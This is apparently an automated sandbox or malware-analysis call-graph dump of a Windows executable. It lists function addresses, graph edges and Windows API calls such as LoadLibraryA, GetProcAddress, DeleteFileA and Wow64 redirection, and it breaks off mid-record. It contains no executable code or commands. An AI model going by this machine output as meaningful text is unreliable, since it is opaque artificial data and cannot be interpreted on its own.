TlsGetValue TlsGetValue 55875->55886 55876 446da4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55876->55883 55877 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55877->55883 55878 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55878->55883 55879 402648 4 API calls 55879->55883 55881 431ca0 4 API calls 55881->55883 55882->55874 55883->55876 55883->55877 55883->55878 55883->55879 55883->55881 55883->55882 55884 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55883->55884 55887 4343b0 55883->55887 55899 434b74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55883->55899 55884->55883 55886->55872 55888 43446d 55887->55888 55889 4343dd 55887->55889 55918 434310 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55888->55918 55890 403494 4 API calls 55889->55890 55892 4343eb 55890->55892 55894 403778 4 API calls 55892->55894 55893 43445f 55895 403400 4 API calls 55893->55895 55897 43440c 55894->55897 55896 4344bd 55895->55896 55896->55883 55897->55893 55900 494944 55897->55900 55899->55883 55901 49497c 55900->55901 55902 494a14 55900->55902 55904 403494 4 API calls 55901->55904 55919 448930 55902->55919 55907 494987 55904->55907 55905 494997 55906 403400 4 API calls 55905->55906 55908 494a38 55906->55908 55907->55905 55909 4037b8 4 API calls 55907->55909 55910 403400 4 API calls 55908->55910 55912 4949b0 55909->55912 55911 494a40 55910->55911 55911->55897 55912->55905 55913 4037b8 4 API calls 55912->55913 55914 4949d3 55913->55914 55915 403778 4 API calls 55914->55915 55916 494a04 55915->55916 55917 403634 4 API calls 55916->55917 55917->55902 55918->55893 55920 448955 55919->55920 55921 448998 55919->55921 55922 403494 4 API calls 55920->55922 55924 4489ac 55921->55924 55931 44852c 55921->55931 55923 448960 55922->55923 55928 4037b8 4 API calls 55923->55928 55926 403400 4 API calls 55924->55926 55927 4489df 55926->55927 55927->55905 55929 44897c 55928->55929 55930 4037b8 4 API calls 55929->55930 55930->55921 55932 403494 4 API calls 55931->55932 55933 448562 55932->55933 55934 4037b8 4 API calls 55933->55934 55935 448574 55934->55935 55936 403778 4 API calls 55935->55936 55937 448595 55936->55937 55938 4037b8 4 API calls 55937->55938 55939 4485ad 55938->55939 55940 403778 4 API calls 55939->55940 55941 4485d8 55940->55941 55942 4037b8 4 API calls 55941->55942 55952 4485f0 55942->55952 55943 448628 55945 403420 4 API calls 55943->55945 55944 4486c3 55948 4486cb GetProcAddress 55944->55948 55949 448708 55945->55949 55946 44864b LoadLibraryExA 55946->55952 55947 44865d LoadLibraryA 55947->55952 55950 4486de 55948->55950 55949->55924 55950->55943 55951 403b80 4 API calls 55951->55952 55952->55943 55952->55944 55952->55946 55952->55947 55952->55951 55953 403450 4 API calls 55952->55953 55955 43da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55952->55955 55953->55952 55955->55952 50241 402584 50242 402598 50241->50242 50243 4025ab 50241->50243 50271 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50242->50271 50245 4025c2 RtlEnterCriticalSection 50243->50245 50246 4025cc 50243->50246 50245->50246 50257 4023b4 13 API calls 50246->50257 50247 40259d 50247->50243 50249 4025a1 50247->50249 50250 4025d9 50253 402635 50250->50253 50254 40262b RtlLeaveCriticalSection 50250->50254 50251 4025d5 50251->50250 50258 402088 50251->50258 50254->50253 50255 4025e5 50255->50250 50272 402210 9 API calls 50255->50272 50257->50251 50259 40209c 50258->50259 50260 4020af 50258->50260 50279 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 50259->50279 50262 4020c6 RtlEnterCriticalSection 50260->50262 50265 4020d0 50260->50265 50262->50265 50263 4020a1 50263->50260 50264 4020a5 50263->50264 50266 402106 50264->50266 50265->50266 50273 401f94 50265->50273 50266->50255 50269 4021f1 RtlLeaveCriticalSection 50270 4021fb 50269->50270 50270->50255 50271->50247 50272->50250 50276 401fa4 50273->50276 50274 401fd0 50278 401ff4 50274->50278 50285 401db4 50274->50285 50276->50274 50276->50278 50280 401f0c 50276->50280 50278->50269 50278->50270 50279->50263 50289 40178c 50280->50289 50283 401f29 50283->50276 50286 401dd2 50285->50286 50287 401e02 50285->50287 50286->50278 50287->50286 50317 401d1c 50287->50317 50295 4017a8 50289->50295 50291 4017b2 50308 401678 VirtualAlloc 50291->50308 50293 40180f 50293->50283 50299 401e80 9 API calls 50293->50299 50295->50291 50295->50293 50297 401803 50295->50297 50300 4014e4 50295->50300 50309 4013e0 LocalAlloc 50295->50309 50296 4017be 50296->50293 50310 4015c0 VirtualFree 50297->50310 50299->50283 50301 4014f3 VirtualAlloc 50300->50301 50303 401520 50301->50303 50304 401543 50301->50304 50311 401398 50303->50311 50304->50295 50307 401530 VirtualFree 50307->50304 50308->50296 50309->50295 50310->50293 50314 401340 50311->50314 50315 40134c LocalAlloc 50314->50315 50316 40135e 50314->50316 50315->50316 50316->50304 50316->50307 50318 401d2e 50317->50318 50319 401d51 50318->50319 50320 401d63 50318->50320 50330 401940 50319->50330 50322 401940 3 API calls 50320->50322 50323 401d61 50322->50323 50329 401d79 50323->50329 50340 401bf8 9 API calls 50323->50340 50325 401d88 50326 401da2 50325->50326 50341 401c4c 9 API calls 50325->50341 50342 401454 LocalAlloc 50326->50342 50329->50286 50331 4019bf 50330->50331 50332 401966 50330->50332 50331->50323 50343 40170c 50332->50343 50336 401983 50337 40199a 50336->50337 50348 4015c0 VirtualFree 50336->50348 50337->50331 50349 401454 LocalAlloc 50337->50349 50340->50325 50341->50326 50342->50329 50345 401743 50343->50345 50344 401783 50347 4013e0 LocalAlloc 50344->50347 50345->50344 50346 40175d VirtualFree 50345->50346 50346->50345 50347->50336 50348->50337 50349->50331 50350 416644 50351 416651 50350->50351 50352 4166ab 50350->50352 50357 416550 CreateWindowExA 50351->50357 50353 416658 SetPropA SetPropA 50353->50352 50354 41668b 50353->50354 50355 41669e SetWindowPos 50354->50355 50355->50352 50357->50353 55956 4222e4 55957 4222f3 55956->55957 55962 421274 55957->55962 55960 422313 55963 4212e3 55962->55963 55965 421283 55962->55965 55967 4212f4 55963->55967 55987 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55963->55987 55965->55963 55986 408d2c 19 API calls 55965->55986 55966 421322 55973 421395 55966->55973 55977 42133d 55966->55977 55967->55966 55968 4213ba 55967->55968 55970 4213ce SetMenu 55968->55970 55983 421393 55968->55983 55969 4213e6 55990 4211bc 10 API calls 55969->55990 55970->55983 55975 4213a9 55973->55975 55973->55983 55974 4213ed 55974->55960 55985 4221e8 10 API calls 55974->55985 55978 4213b2 SetMenu 55975->55978 55979 421360 GetMenu 55977->55979 55977->55983 55978->55983 55980 421383 55979->55980 55981 42136a 55979->55981 55988 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55980->55988 55984 42137d SetMenu 55981->55984 55983->55969 55989 421e2c 11 API calls 55983->55989 55984->55980 55985->55960 55986->55965 55987->55967 55988->55983 55989->55969 55990->55974 55991 44b4a8 55992 44b4b6 55991->55992 55994 44b4d5 55991->55994 55993 44b38c 11 API calls 55992->55993 55992->55994 55993->55994 55995 448728 55996 448756 55995->55996 55997 44875d 55995->55997 56000 403400 4 API calls 55996->56000 55998 448771 55997->55998 56001 44852c 7 API calls 55997->56001 55998->55996 55999 403494 4 API calls 55998->55999 56002 44878a 55999->56002 56003 448907 56000->56003 56001->55998 56004 4037b8 4 API calls 56002->56004 56005 4487a6 56004->56005 56006 4037b8 4 API calls 56005->56006 56007 4487c2 56006->56007 56007->55996 56008 4487d6 56007->56008 56009 4037b8 4 API calls 56008->56009 56010 4487f0 56009->56010 56011 431bd0 4 API calls 56010->56011 56012 448812 56011->56012 56013 431ca0 4 API calls 56012->56013 56014 448832 56012->56014 56013->56012 56015 448870 56014->56015 56038 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56014->56038 56016 448888 56015->56016 56039 4435d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56015->56039 56027 442334 56016->56027 56019 4488bc GetLastError 56040 4484c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56019->56040 56022 4488cb 56041 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56022->56041 56024 4488e0 56042 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56024->56042 56026 4488e8 56028 443312 56027->56028 56029 44236d 56027->56029 56031 403400 4 API calls 56028->56031 56030 403400 4 API calls 56029->56030 56032 442375 56030->56032 56033 443327 56031->56033 56034 431bd0 4 API calls 56032->56034 56033->56019 56035 442381 56034->56035 56036 443302 56035->56036 56043 441a0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56035->56043 56036->56019 56038->56014 56039->56016 56040->56022 56041->56024 56042->56026 56043->56035 56044 4165ec DestroyWindow 56045 42e3ef SetErrorMode 50358 441394 50359 44139d 50358->50359 50360 4413ab WriteFile 50358->50360 50359->50360 50361 4413b6 50360->50361 56046 491bf8 56047 491c32 56046->56047 56048 491c3e 56047->56048 56049 491c34 56047->56049 56051 491c4d 56048->56051 56052 491c76 56048->56052 56242 409098 MessageBeep 56049->56242 56054 446ff8 18 API calls 56051->56054 56059 491cae 56052->56059 56060 491c85 56052->56060 56053 403420 4 API calls 56055 49228a 56053->56055 56056 491c5a 56054->56056 56057 403400 4 API calls 56055->56057 56243 406bb0 56056->56243 56061 492292 56057->56061 56066 491cbd 56059->56066 56067 491ce6 56059->56067 56063 446ff8 18 API calls 56060->56063 56065 491c92 56063->56065 56251 406c00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56065->56251 56069 446ff8 18 API calls 56066->56069 56074 491d0e 56067->56074 56075 491cf5 56067->56075 56072 491cca 56069->56072 56070 491c9d 56252 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56070->56252 56253 406c34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56072->56253 56081 491d1d 56074->56081 56082 491d42 56074->56082 56255 407280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 56075->56255 56077 491cd5 56254 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56077->56254 56078 491cfd 56256 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56078->56256 56083 446ff8 18 API calls 56081->56083 56085 491d7a 56082->56085 56086 491d51 56082->56086 56084 491d2a 56083->56084 56087 4072a8 SetCurrentDirectoryA 56084->56087 56093 491d89 56085->56093 56094 491db2 56085->56094 56088 446ff8 18 API calls 56086->56088 56089 491d32 56087->56089 56090 491d5e 56088->56090 56257 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56089->56257 56092 42c804 5 API calls 56090->56092 56095 491d69 56092->56095 56096 446ff8 18 API calls 56093->56096 56099 491dfe 56094->56099 56100 491dc1 56094->56100 56258 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56095->56258 56098 491d96 56096->56098 56259 4071f8 8 API calls 56098->56259 56106 491e0d 56099->56106 56107 491e36 56099->56107 56102 446ff8 18 API calls 56100->56102 56105 491dd0 56102->56105 56103 491da1 56260 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56103->56260 56108 446ff8 18 API calls 56105->56108 56109 446ff8 18 API calls 56106->56109 56114 491e6e 56107->56114 56115 491e45 56107->56115 56110 491de1 56108->56110 56111 491e1a 56109->56111 56261 4918fc 8 API calls 56110->56261 56113 42c8a4 5 API calls 56111->56113 56117 491e25 56113->56117 56122 491e7d 56114->56122 56123 491ea6 56114->56123 56118 446ff8 18 API calls 56115->56118 56116 491ded 56262 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56116->56262 56263 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56117->56263 56121 491e52 56118->56121 56124 42c8cc 5 API calls 56121->56124 56125 446ff8 18 API calls 56122->56125 56130 491ede 56123->56130 56131 491eb5 56123->56131 56126 491e5d 56124->56126 56128 491e8a 56125->56128 56264 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56126->56264 56265 42c8fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56128->56265 56137 491eed 56130->56137 56138 491f16 56130->56138 56132 446ff8 18 API calls 56131->56132 56134 491ec2 56132->56134 56133 491e95 56266 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56133->56266 56136 42c92c 5 API calls 56134->56136 56139 491ecd 56136->56139 56140 446ff8 18 API calls 56137->56140 56143 491f62 56138->56143 56144 491f25 56138->56144 56267 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56139->56267 56142 491efa 56140->56142 56145 42c954 5 API calls 56142->56145 56151 491f71 56143->56151 56152 491fb4 56143->56152 56146 446ff8 18 API calls 56144->56146 56147 491f05 56145->56147 56148 491f34 56146->56148 56268 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56147->56268 56150 446ff8 18 API calls 56148->56150 56154 491f45 56150->56154 56153 446ff8 18 API calls 56151->56153 56159 491fc3 56152->56159 56160 492027 56152->56160 56155 491f84 56153->56155 56269 42c4f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 56154->56269 56157 446ff8 18 API calls 56155->56157 56161 491f95 56157->56161 56158 491f51 56270 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56158->56270 56163 446ff8 18 API calls 56159->56163 56167 492066 56160->56167 56168 492036 56160->56168 56271 491af4 12 API calls 56161->56271 56165 491fd0 56163->56165 56234 42c608 7 API calls 56165->56234 56166 491fa3 56272 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56166->56272 56178 4920a5 56167->56178 56179 492075 56167->56179 56171 446ff8 18 API calls 56168->56171 56175 492043 56171->56175 56172 491fde 56173 491fe2 56172->56173 56174 492017 56172->56174 56177 446ff8 18 API calls 56173->56177 56274 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56174->56274 56275 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56175->56275 56182 491ff1 56177->56182 56187 4920e4 56178->56187 56188 4920b4 56178->56188 56183 446ff8 18 API calls 56179->56183 56181 492050 56276 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56181->56276 56235 452c80 56182->56235 56186 492082 56183->56186 56191 452770 5 API calls 56186->56191 56198 49212c 56187->56198 56199 4920f3 56187->56199 56192 446ff8 18 API calls 56188->56192 56189 492061 56214 491c39 56189->56214 56190 492001 56273 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56190->56273 56194 49208f 56191->56194 56195 4920c1 56192->56195 56277 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56194->56277 56278 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56195->56278 56204 49213b 56198->56204 56205 492174 56198->56205 56201 446ff8 18 API calls 56199->56201 56200 4920ce 56279 4470d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56200->56279 56203 492102 56201->56203 56206 446ff8 18 API calls 56203->56206 56207 446ff8 18 API calls 56204->56207 56210 492187 56205->56210 56216 49223d 56205->56216 56208 492113 56206->56208 56209 49214a 56207->56209 56212 447278 5 API calls 56208->56212 56211 446ff8 18 API calls 56209->56211 56213 446ff8 18 API calls 56210->56213 56217 49215b 56211->56217 56212->56214 56215 4921b4 56213->56215 56214->56053 56218 446ff8 18 API calls 56215->56218 56216->56214 56283 446f9c 18 API calls 56216->56283 56221 447278 5 API calls 56217->56221 56219 4921cb 56218->56219 56280 407ddc 7 API calls 56219->56280 56221->56214 56222 492256 56223 42e8c8 5 API calls 56222->56223 56224 49225e 56223->56224 56284 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56224->56284 56227 4921ed 56228 446ff8 18 API calls 56227->56228 56229 492201 56228->56229 56281 408508 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56229->56281 56231 49220c 56282 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56231->56282 56233 492218 56234->56172 56236 452724 2 API calls 56235->56236 56238 452c99 56236->56238 56237 452c9d 56237->56190 56238->56237 56239 452cc1 MoveFileA GetLastError 56238->56239 56240 452760 Wow64RevertWow64FsRedirection 56239->56240 56241 452ce7 56240->56241 56241->56190 56242->56214 56244 406bbf 56243->56244 56245 406bd8 56244->56245 56247 406be1 56244->56247 56246 403400 4 API calls 56245->56246 56248 406bdf 56246->56248 56249 403778 4 API calls 56247->56249 56250 44734c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 56248->56250 56249->56248 56250->56214 56251->56070 56252->56214 56253->56077 56254->56214 56255->56078 56256->56214 56257->56214 56258->56214 56259->56103 56260->56214 56261->56116 56262->56214 56263->56214 56264->56214 56265->56133 56266->56214 56267->56214 56268->56214 56269->56158 56270->56214 56271->56166 56272->56214 56273->56214 56274->56214 56275->56181 56276->56189 56277->56214 56278->56200 56279->56214 56280->56227 56281->56231 56282->56233 56283->56222 56284->56214 56285 40cc34 56288 406f10 WriteFile 56285->56288 56289 406f2d 56288->56289 50362 48095d 50367 451004 50362->50367 50364 480971 50377 47fa0c 50364->50377 50366 480995 50368 451011 50367->50368 50370 451065 50368->50370 50386 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50368->50386 50383 450e88 50370->50383 50374 45108d 50375 4510d0 50374->50375 50388 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50374->50388 50375->50364 50393 40b3c8 50377->50393 50379 47fa79 50379->50366 50382 47fa2e 50382->50379 50397 4069dc 50382->50397 50400 476994 50382->50400 50389 450e34 50383->50389 50386->50370 50387 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50387->50374 50388->50375 50390 450e46 50389->50390 50391 450e57 50389->50391 50392 450e4b InterlockedExchange 50390->50392 50391->50374 50391->50387 50392->50391 50394 40b3d3 50393->50394 50395 40b3f3 50394->50395 50416 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50394->50416 50395->50382 50398 402648 4 API calls 50397->50398 50399 4069e7 50398->50399 50399->50382 50412 4769c5 50400->50412 50414 476a0e 50400->50414 50401 476a59 50417 451294 50401->50417 50402 451294 21 API calls 50402->50412 50404 476a70 50406 403420 4 API calls 50404->50406 50408 476a8a 50406->50408 50407 4038a4 4 API calls 50407->50414 50408->50382 50411 403450 4 API calls 50411->50414 50412->50402 50412->50414 50423 4038a4 50412->50423 50432 403744 50412->50432 50436 403450 50412->50436 50413 403744 4 API calls 50413->50414 50414->50401 50414->50407 50414->50411 50414->50413 50415 451294 21 API calls 50414->50415 50415->50414 50416->50395 50418 4512af 50417->50418 50422 4512a4 50417->50422 50442 451238 21 API calls 50418->50442 50420 4512ba 50420->50422 50443 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50420->50443 50422->50404 50425 4038b1 50423->50425 50431 4038e1 50423->50431 50424 403400 4 API calls 50427 4038cb 50424->50427 50426 4038da 50425->50426 50428 4038bd 50425->50428 50429 4034bc 4 API calls 50426->50429 50427->50412 50444 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50428->50444 50429->50431 50431->50424 50433 40374a 50432->50433 50435 40375b 50432->50435 50434 4034bc 4 API calls 50433->50434 50433->50435 50434->50435 50435->50412 50437 403454 50436->50437 50440 403464 50436->50440 50439 4034bc 4 API calls 50437->50439 50437->50440 50438 403490 50438->50412 50439->50440 50440->50438 50441 402660 4 API calls 50440->50441 50441->50438 50442->50420 50443->50422 50444->50427 50445 41ee54 50446 41ee63 IsWindowVisible 50445->50446 50447 41ee99 50445->50447 50446->50447 50448 41ee6d IsWindowEnabled 50446->50448 50448->50447 50449 41ee77 50448->50449 50450 402648 4 API calls 50449->50450 50451 41ee81 EnableWindow 50450->50451 50451->50447 50452 46bb10 50453 46bb44 50452->50453 50484 46bfad 50452->50484 50457 46bbdc 50453->50457 50458 46bbba 50453->50458 50459 46bbcb 50453->50459 50460 46bb98 50453->50460 50461 46bba9 50453->50461 50470 46bb80 50453->50470 50454 403400 4 API calls 50456 46bfec 50454->50456 50465 403400 4 API calls 50456->50465 50775 46baa0 45 API calls 50457->50775 50508 46b6d0 50458->50508 50774 46b890 67 API calls 50459->50774 50772 46b420 47 API calls 50460->50772 50773 46b588 42 API calls 50461->50773 50469 46bff4 50465->50469 50468 46bb9e 50468->50470 50468->50484 50470->50484 50543 468c74 50470->50543 50471 46bc18 50471->50484 50487 46bc5b 50471->50487 50776 494da0 50471->50776 50474 46bd7e 50795 48358c 123 API calls 50474->50795 50475 414ae8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50475->50487 50478 46bd99 50478->50484 50479 42cbc0 6 API calls 50479->50487 50480 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50480->50487 50481 46af68 23 API calls 50481->50487 50484->50454 50485 46bdd7 50561 469f1c 50485->50561 50486 46af68 23 API calls 50486->50484 50487->50474 50487->50475 50487->50479 50487->50480 50487->50481 50487->50484 50487->50485 50504 46be9f 50487->50504 50546 468bb0 50487->50546 50554 46acd4 50487->50554 50699 483084 50487->50699 50812 46b1dc 19 API calls 50487->50812 50489 46be3d 50490 403450 4 API calls 50489->50490 50491 46be4d 50490->50491 50492 46bea9 50491->50492 50493 46be59 50491->50493 50498 46bf6b 50492->50498 50622 46af68 50492->50622 50796 457f1c 50493->50796 50497 457f1c 24 API calls 50497->50504 50504->50486 50813 46c424 50508->50813 50511 46b852 50513 403420 4 API calls 50511->50513 50515 46b86c 50513->50515 50514 46b71e 50516 46b83e 50514->50516 50820 455f84 13 API calls 50514->50820 50517 403400 4 API calls 50515->50517 50516->50511 50519 403450 4 API calls 50516->50519 50520 46b874 50517->50520 50519->50511 50521 403400 4 API calls 50520->50521 50522 46b87c 50521->50522 50522->50470 50523 46b801 50523->50511 50523->50516 50528 42cd48 7 API calls 50523->50528 50525 46b7a1 50525->50511 50525->50523 50830 42cd48 50525->50830 50527 46b73c 50527->50525 50821 466600 50527->50821 50530 46b817 50528->50530 50530->50516 50535 451458 4 API calls 50530->50535 50534 466600 19 API calls 50537 46b77c 50534->50537 50538 46b82e 50535->50538 50837 47efd0 42 API calls 50538->50837 50544 468bb0 19 API calls 50543->50544 50545 468c83 50544->50545 50545->50471 50547 468bdf 50546->50547 50548 4078f4 19 API calls 50547->50548 50551 468c20 50547->50551 50549 468c18 50548->50549 51090 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50549->51090 50552 403400 4 API calls 50551->50552 50553 468c38 50552->50553 50553->50487 50555 46ace5 50554->50555 50556 46ace0 50554->50556 51176 469a80 46 API calls 50555->51176 50558 46ace3 50556->50558 51091 46a740 50556->51091 50558->50487 50559 46aced 50559->50487 50562 403400 4 API calls 50561->50562 50563 469f4a 50562->50563 51553 47dd00 50563->51553 50565 469fad 50566 469fb1 50565->50566 50567 469fca 50565->50567 51560 466800 50566->51560 50569 469fbb 50567->50569 51563 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50567->51563 50571 46a25e 50569->50571 50574 46a154 50569->50574 50575 46a0e9 50569->50575 50572 403420 4 API calls 50571->50572 50577 46a288 50572->50577 50573 469fe6 50573->50569 50578 469fee 50573->50578 50576 403494 4 API calls 50574->50576 50579 403494 4 API calls 50575->50579 50581 46a161 50576->50581 50577->50489 50582 46af68 23 API calls 50578->50582 50580 46a0f6 50579->50580 50583 40357c 4 API calls 50580->50583 50584 40357c 4 API calls 50581->50584 50591 469ffb 50582->50591 50585 46a103 50583->50585 50586 46a16e 50584->50586 50587 40357c 4 API calls 50585->50587 50588 40357c 4 API calls 50586->50588 50589 46a110 50587->50589 50590 46a17b 50588->50590 50592 40357c 4 API calls 50589->50592 50593 40357c 4 API calls 50590->50593 50596 46a024 SetActiveWindow 50591->50596 50597 46a03c 50591->50597 50594 46a11d 50592->50594 50595 46a188 50593->50595 50598 466800 20 API calls 50594->50598 50599 40357c 4 API calls 50595->50599 50596->50597 51564 42f560 50597->51564 50600 46a12b 50598->50600 50601 46a196 50599->50601 50603 40357c 4 API calls 50600->50603 50604 414b18 4 API calls 50601->50604 50606 46a134 50603->50606 50607 46a152 50604->50607 50609 40357c 4 API calls 50606->50609 51581 466b38 50607->51581 50612 46a141 50609->50612 50611 46a08d 50614 46ade4 21 API calls 50611->50614 50613 414b18 4 API calls 50612->50613 50613->50607 50615 46a0bf 50614->50615 50615->50489 50623 468c74 19 API calls 50622->50623 50624 46af80 50623->50624 50625 46afa2 50624->50625 50626 4652cc 7 API calls 50624->50626 51777 4652cc 50625->51777 50626->50625 50630 46afba 50631 46ade4 21 API calls 50630->50631 50632 46aff2 50631->50632 50633 414b18 4 API calls 50632->50633 50634 46b006 50633->50634 50635 46b012 50634->50635 50636 46b03c 50634->50636 50637 414b18 4 API calls 50635->50637 50639 46b05b 50636->50639 50640 46b085 50636->50640 50638 46b026 50637->50638 50641 414b18 4 API calls 50638->50641 50642 414b18 4 API calls 50639->50642 50643 414b18 4 API calls 50640->50643 50645 46b03a 50641->50645 50646 46b06f 50642->50646 50644 46b099 50643->50644 50647 414b18 4 API calls 50644->50647 50648 414b18 4 API calls 50646->50648 50647->50645 50648->50645 50700 46c424 48 API calls 50699->50700 50701 4830c7 50700->50701 50702 4830d0 50701->50702 52064 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50701->52064 50704 414ae8 4 API calls 50702->50704 50705 4830e0 50704->50705 50706 403450 4 API calls 50705->50706 50707 4830ed 50706->50707 51866 46c77c 50707->51866 50710 4830fd 50712 414ae8 4 API calls 50710->50712 50713 48310d 50712->50713 50714 403450 4 API calls 50713->50714 50715 48311a 50714->50715 50716 469868 SendMessageA 50715->50716 50717 483133 50716->50717 50718 483184 50717->50718 52066 479e18 23 API calls 50717->52066 51895 4241dc IsIconic 50718->51895 50722 48319f SetActiveWindow 50723 4831b4 50722->50723 51903 4824b4 50723->51903 50772->50468 50773->50470 50774->50470 50775->50470 53719 43d9c8 50776->53719 50779 494dcc 53724 431bd0 50779->53724 50780 494e52 50781 494e61 50780->50781 53757 4945c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50780->53757 50781->50487 50790 494e16 53755 49465c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50790->53755 50792 494e2a 53756 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50792->53756 50794 494e4a 50794->50487 50795->50478 50797 457f41 50796->50797 50798 457f61 50797->50798 50799 4078f4 19 API calls 50797->50799 50800 403400 4 API calls 50798->50800 50801 457f59 50799->50801 50802 457f76 50800->50802 50803 457d10 24 API calls 50801->50803 50802->50497 50803->50798 50812->50487 50838 46c4bc 50813->50838 50816 414ae8 50817 414af6 50816->50817 50818 4034e0 4 API calls 50817->50818 50819 414b03 50818->50819 50819->50514 50820->50527 50822 46661a 50821->50822 51041 4078f4 50822->51041 51084 42cccc 50830->51084 50833 451458 50834 451428 4 API calls 50833->50834 50835 451474 50834->50835 50836 47efd0 42 API calls 50835->50836 50836->50523 50837->50516 50839 414ae8 4 API calls 50838->50839 50840 46c4f0 50839->50840 50899 466898 50840->50899 50844 46c502 50845 46c511 50844->50845 50848 46c52a 50844->50848 50968 47efd0 42 API calls 50845->50968 50847 403420 4 API calls 50850 46b702 50847->50850 50849 46c571 50848->50849 50851 46c558 50848->50851 50852 46c5d6 50849->50852 50857 46c575 50849->50857 50850->50511 50850->50816 50969 47efd0 42 API calls 50851->50969 50971 42cb4c CharNextA 50852->50971 50855 46c5e5 50856 46c5e9 50855->50856 50861 46c602 50855->50861 50972 47efd0 42 API calls 50856->50972 50859 46c5bd 50857->50859 50857->50861 50970 47efd0 42 API calls 50859->50970 50860 46c626 50973 47efd0 42 API calls 50860->50973 50861->50860 50913 466a08 50861->50913 50866 46c525 50866->50847 50869 46c63f 50921 403778 50869->50921 50874 46c666 50974 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50874->50974 50875 46c697 50932 42c8cc 50875->50932 50878 46c679 50880 451458 4 API calls 50878->50880 50882 46c686 50880->50882 50975 47efd0 42 API calls 50882->50975 50904 4668b2 50899->50904 50900 406bb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50900->50904 50902 42cbc0 6 API calls 50902->50904 50903 403450 4 API calls 50903->50904 50904->50900 50904->50902 50904->50903 50905 4668fb 50904->50905 50978 42caac 50904->50978 50906 403420 4 API calls 50905->50906 50907 466915 50906->50907 50908 414b18 50907->50908 50909 414ae8 4 API calls 50908->50909 50910 414b3c 50909->50910 50911 403400 4 API calls 50910->50911 50912 414b6d 50911->50912 50912->50844 50914 466a12 50913->50914 50915 466a25 50914->50915 50994 42cb3c CharNextA 50914->50994 50915->50860 50917 466a38 50915->50917 50918 466a42 50917->50918 50919 466a6f 50918->50919 50995 42cb3c CharNextA 50918->50995 50919->50860 50919->50869 50922 4037aa 50921->50922 50923 40377d 50921->50923 50924 403400 4 API calls 50922->50924 50923->50922 50925 403791 50923->50925 50927 4037a0 50924->50927 50926 4034e0 4 API calls 50925->50926 50926->50927 50928 42c99c 50927->50928 50929 42c9b2 50928->50929 50930 42c9f5 50928->50930 50929->50930 50996 42cb3c CharNextA 50929->50996 50930->50874 50930->50875 50997 42c674 50932->50997 50968->50866 50969->50866 50970->50866 50971->50855 50972->50866 50973->50866 50974->50878 50975->50866 50979 403494 4 API calls 50978->50979 50980 42cabc 50979->50980 50981 403744 4 API calls 